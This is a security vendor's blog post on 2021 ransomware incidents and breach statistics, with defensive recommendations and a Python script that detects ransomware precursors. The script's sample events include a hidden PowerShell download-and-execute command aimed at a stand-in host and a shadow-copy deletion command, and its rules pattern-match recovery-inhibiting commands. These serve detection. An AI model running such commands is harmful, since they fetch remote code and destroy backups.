Lessons From Kaseya, REvil, and Other Recent Data Breaches: Is it Really ALL About Ransomware?

October 7, 2022

A cursory glance at the media in 2021 tells us all we need to know about recent data breaches.

Today, organisations need to be concerned about ransomware… and that’s about it.

But does that tell the whole story? Let’s find out.

Ransomware: The Main Cause of Recent Data Breaches?

There’s nothing new about ransomware.

From its inception as the AIDS trojan in 1989 to the first variants of ‘modern’ ransomware in the early 2000s, ransomware has plagued organisations for decades.

The birth of bitcoin in 2009 fuelled what we now call the ‘ransomware epidemic’. By 2010, there were more than 10,000 ransomware samples identified in the wild, and today it’s easily the most widely discussed cyber threat.

With so much attention in the media, you’d be forgiven for thinking it’s the only threat today’s organisations face. Consider some recent data breaches of 2021:

In March 2021, Taiwanese computer and electronics manufacturer Acer was hit by an affiliate of ransomware group REvil, who demanded a record-breaking (at the time) $50 million ransom payment in exchange for a decryption program, vulnerability report, and the deletion of stolen files.

In May 2021, U.S. fuel pipeline operator Colonial Pipeline, which carries roughly 45% of the fuel consumed on the East Coast, shut down its pipeline after DarkSide ransomware infected its IT systems. The company paid the $4.4 million ransom within hours of the attack, but the decryptor it received was so slow that it recovered largely from its own backups instead. It hardly mattered: the pipeline stayed closed for five days, panic buying of fuel spread along the East Coast, and federal regulators issued a regional emergency declaration that temporarily lifted limits on drivers transporting fuel by road. Within days, the president signed a new executive order (EO 14028) imposing stricter security requirements on software sold to federal government departments.

In July 2021, a REvil ransomware affiliate exploited vulnerabilities in Kaseya's VSA remote management product to push ransomware through dozens of managed service providers to as many as 1,500 of their downstream customers. Kaseya stated it had not paid the $70 million ransom demanded and that it had obtained, from a trusted third party, a decryption tool that was 100% effective in helping customers recover. Accounts of where that key came from differ: a REvil member claimed on a criminal forum that a coder had accidentally generated and released a universal decryption key, while later reporting attributed the key to the FBI, which had obtained it from REvil's own infrastructure. Either way, it probably saved affected organisations hundreds of millions of dollars in combined ransoms and recovery costs.

In October 2021, UK jeweller Graff suffered a combined ransomware and data theft attack by Russian group Conti. 69,000 documents were leaked on the dark web in early November, including the personal information of celebrities, politicians, business magnates, and even members of the royal families of several Arab states. The group later apologised to those royal families and removed their data, possibly fearing retaliation.

These are just a handful of the barrage of media stories featuring ransomware attacks in 2021 against businesses, government organisations, schools, hospitals, telecommunications providers, and more. But does all this attention give a full picture of the threats today’s organisations face?

In a word: No.

Is It REALLY All About Ransomware?

If all we knew about cyber threats were what the media tells us, we’d assume that ransomware and supply chain attacks are pretty much the only threat today’s organisations face. But that’s… not true.

According to the Verizon 2021 Data Breach Investigations Report, ransomware accounts for around 5% of security incidents and 10% of security breaches. That’s a significant trend—but it leaves a lot of incidents and breaches unaccounted for.

Social engineering and basic web application attacks are both more common than ransomware, whether measured by incidents or by breaches. Meanwhile, Denial of Service (DoS) attacks account for almost half of all recorded incidents, and can be highly disruptive and costly, but 0% of breaches, because they do not expose or alter records or files.

Finally, human errors like lost devices, misconfigurations, and sending data to the wrong recipients cause a small proportion of security incidents but a disproportionately high number of breaches.

Threat Category                  % Incidents   % Breaches
Social Engineering               13%           33%
Basic Web Application Attacks    17%           26%
Human Error                      7.5%          18.5%
Denial of Service Attacks        49%           0%

Add that up, and you’ve got a significant discrepancy between what’s reported in the media and what organisations face in the real world.

Does that mean you shouldn’t be worried about ransomware? Absolutely not.

Ransomware attacks can be devastating. The media headlines we’ve all read are ample proof of that. However, organisations shouldn’t prepare for these attacks at the expense of protecting against other common threats.

How To Protect Against Common Cyber Threats

Based on the trends we’ve explored in recent data breaches, there are some obvious steps all organisations should take to protect against cyber threats and security breaches:

  • Consistently maintain foundational security controls like vulnerability and patch management, penetration testing, configuration management, etc.
  • Protect critical web-facing assets from DoS attacks.
  • Purchase tools that can detect the most common threats—i.e., web application attacks, malware (including ransomware), and phishing—and either prevent them at their source or immediately flag them for incident responders.
  • Train staff to follow IT and security protocols and detect common threats like social engineering, including phishing, fraudulent text and voice messages, and Business Email Compromise (BEC).

These controls will help organisations detect, prevent, and respond to all of the most common cyber threats… including ransomware.

Remember, ransomware doesn’t magically appear inside a network. It has to be planted there somehow—often using social engineering techniques like phishing or exploiting vulnerabilities or misconfigurations in common IT systems. As a result, controls designed to protect against those threats will also protect organisations against a high proportion of ransomware attacks.
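Those footholds leave traces long before files are encrypted, which is what the detection tooling recommended above should be looking for. The following Python script is an added example, not code from the original post or from CyberOne's own tooling: it runs three checks over constructed process and file-rename events, flagging a document reader spawning a shell (the usual phishing-macro entry point), commands that delete shadow copies or disable recovery, and a burst of renames to one new extension by a single process. The JSON event format, thresholds, host names, paths and sample events are assumptions made here for illustration.

```python
"""Detection of common ransomware precursors over constructed log lines.

Added example, not from the original post or CyberOne. The JSON event format,
thresholds and sample events are assumptions; the indicators themselves are
well-documented ransomware behaviours (MITRE ATT&CK T1490, T1566).
"""
import json
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Commands that delete backups or disable recovery ahead of encryption (T1490).
RECOVERY_INHIBIT = [
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    re.compile(r"bcdedit(\.exe)?\s.*recoveryenabled\s+no", re.I),
]
# A document reader spawning a shell is the classic phishing-macro foothold.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Assumed thresholds: this many renames to a single new extension by one
# process inside the window is treated as bulk encryption in progress.
RENAME_THRESHOLD = 20
RENAME_WINDOW = timedelta(seconds=60)


def parse_event(line):
    """Parse one JSON log line; 'ts' is an ISO 8601 timestamp."""
    ev = json.loads(line)
    ev["ts"] = datetime.fromisoformat(ev["ts"])
    return ev


def detect(lines):
    """Return (rule, host, pid, detail) alerts for the given log lines, in order."""
    alerts = []
    renames = defaultdict(deque)  # (host, pid) -> recent (ts, extension) pairs
    for line in lines:
        ev = parse_event(line)
        key = (ev["host"], ev["pid"])
        if ev["type"] == "process":
            cmd = ev["cmdline"]
            if any(p.search(cmd) for p in RECOVERY_INHIBIT):
                alerts.append(("inhibit_recovery", ev["host"], ev["pid"], cmd))
            if ev["parent"].lower() in OFFICE_APPS and ev["image"].lower() in SHELLS:
                alerts.append(("office_spawns_shell", ev["host"], ev["pid"],
                               f"{ev['parent']} -> {ev['image']}"))
        elif ev["type"] == "rename":
            name = ev["new_path"].rsplit("\\", 1)[-1]
            ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
            window = renames[key]
            window.append((ev["ts"], ext))
            while ev["ts"] - window[0][0] > RENAME_WINDOW:  # expire old entries
                window.popleft()
            if len(window) >= RENAME_THRESHOLD and len({e for _, e in window}) == 1:
                alerts.append(("mass_rename", ev["host"], ev["pid"],
                               f"{len(window)} files renamed to .{ext} in {RENAME_WINDOW.seconds}s"))
                window.clear()  # one alert per burst
    return alerts


def sample_log(rename_gap_seconds=1):
    """Constructed events (not real telemetry): a macro foothold, recovery
    inhibition and a rename burst on ws01, plus a benign shell on ws02."""
    t0 = datetime(2021, 7, 2, 14, 30, 0)

    def at(seconds):
        return (t0 + timedelta(seconds=seconds)).isoformat()

    events = [
        {"ts": at(0), "type": "process", "host": "ws01", "pid": 4100,
         "parent": "WINWORD.EXE", "image": "powershell.exe",
         "cmdline": "powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/x')"},
        {"ts": at(5), "type": "process", "host": "ws01", "pid": 4188,
         "parent": "powershell.exe", "image": "vssadmin.exe",
         "cmdline": "vssadmin.exe Delete Shadows /All /Quiet"},
        {"ts": at(6), "type": "process", "host": "ws02", "pid": 900,
         "parent": "explorer.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c dir"},
    ]
    for i in range(25):
        events.append({"ts": at(10 + i * rename_gap_seconds), "type": "rename",
                       "host": "ws01", "pid": 4188,
                       "old_path": f"C:\\Users\\alice\\Docs\\report{i}.docx",
                       "new_path": f"C:\\Users\\alice\\Docs\\report{i}.docx.locked"})
    return [json.dumps(e) for e in events]


if __name__ == "__main__":
    for rule, host, pid, detail in detect(sample_log()):
        print(f"[{rule}] {host} pid={pid}: {detail}")
```

Run as-is, the script reports three alerts on ws01 and nothing for the benign shell on ws02; spacing the renames ten seconds apart (`sample_log(rename_gap_seconds=10)`) keeps the burst below the window threshold, so only the two process-based alerts fire. In a real deployment the same rules would read Sysmon or EDR events rather than constructed JSON, and the first two alerts are the ones worth paging on immediately, since they fire before encryption starts.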

Are these controls enough? No.

There is no combination of security tools, processes, and training that can identify and prevent 100% of threats. No matter how hard you try (or how much you spend), there will always be some attacks that circumvent your controls and affect your systems. At that point, two things are important:

  • Secure network design considerations like network segmentation and stringent access controls minimise the damage caused by successful or partially successful cyber attacks by limiting an attacker’s ability to ‘travel’ through a network, access sensitive assets, and perform privileged functions.
  • Rapid and effective response helps quickly identify and resolve security incidents—ideally before sensitive assets or information are damaged, encrypted, or stolen. 

These additional controls are necessary to minimise the damage, disruption, and cost of cyber attacks that successfully bypass your organisation’s defences.

In most cases, they will be enough to protect business continuity and keep costs to a minimum. In the event of serious or sophisticated threats, these controls can mean the difference between a minor disruption and a potentially existential threat.

What Does it Look Like When It’s Done Right?

Consider the recent case of Weir Group, one of Scotland's largest engineering firms. The firm was hit with a sophisticated ransomware attack in September 2021, leading to significant operational disruption. The firm estimates the direct cost of recovering from the incident at £5 million, while revenue slippage and overhead under-recoveries will lead to further losses of £20-35 million.

“Wait, didn’t you say this was a success story?!”

Yes. The story is a success for several reasons:

  • The firm’s security controls quickly identified the threat and performed as intended by shutting down and isolating all IT systems.
  • No personal or business-sensitive information was stolen or encrypted.
  • The firm’s security team meticulously removed all traces of the threat before bringing systems back online to ensure the infection was wholly eradicated.
  • The firm liaised with regulators and intelligence services throughout the incident to ensure it fully complied with the law.

Returning to our recommendations above, Weir had everything in place to minimise the damage caused by a sophisticated cyber threat: robust threat detection, a securely designed network, and effective incident response.

“If Weir Group did everything right, how come they’re on the hook for up to £40 million in costs?!”

Weir Group is a large engineering firm with complicated operations and supply chains. The overall cost of the incident may seem high, but it’s a fact of life for a firm like Weir—major operational disruptions are costly for businesses that rely on seamless distribution.

So the question isn’t, “why did it cost so much?” but rather, “How much more could it have cost if Weir hadn’t responded so effectively?”

It’s impossible to answer this question precisely. For an indication, we can look at some other large organisations that suffered major attacks and didn’t respond as effectively as Weir Group:

And it’s not just about quantifiable costs. Many organisations hit by ransomware attacks are never able to fully recover their digital systems or files. This creates ongoing challenges—and, most likely, costs—that are hard to quantify fully but are nonetheless felt keenly.

By responding quickly and decisively to a detected threat, Weir Group still faced up to £40 million in total costs and losses… but avoided a host of other costs such as:

  • Regulatory fines
  • Reputation damage
  • Longer service disruption and more lost revenue
  • More negative media attention

In all probability, Weir's operations would have suffered a far longer disruption had the ransomware been allowed to spread through and encrypt its systems. Combine that with hefty regulatory fines and the potential for lost business, and it's easy to imagine that £40 million turning into losses that would be hard to absorb.

Added to this, Weir Group has now demonstrated its ability to contain a serious cyber attack without endangering its customers. In a world where household names routinely show they can’t ensure this, Weir’s reputation as a trustworthy and reliable supplier should—and no doubt will—be improved by its effective response to this attack.

Protect Your Organisation from Cyber Attacks

Proactive response is one of the top factors in minimising the impact of security incidents. However, many organisations struggle to implement and maintain effective 24/7/365 incident response capabilities due to a lack of financial and human cybersecurity resources.

Securing your business against ransomware and other attacks is possible with the right combination of people, processes, and technology. Many of the latest software solutions provide a high level of threat protection and provide you with the visibility to detect and respond to attacks.

At CyberOne, we offer the UK’s most advanced managed SOC service, providing always-on detection and response from our award-winning Cyber Defence Centre in Milton Keynes. Benefits include:

  • World-class threat detection and response tailored to your unique network environment.
  • Cloud-native approach enables real-time monitoring of all users, devices, and applications.
  • True 24/7/365 coverage and comprehensive SLAs ensure full protection at all times.
  • We leverage up-to-the-minute threat intelligence to uncover even the latest cyber threats.
  • Get full threat visibility across your entire environment from a single, fully managed platform.

To find out how our Cyber Defence Centre could help protect your organisation—not just from ransomware, but from the full range of cyber threats—visit our website.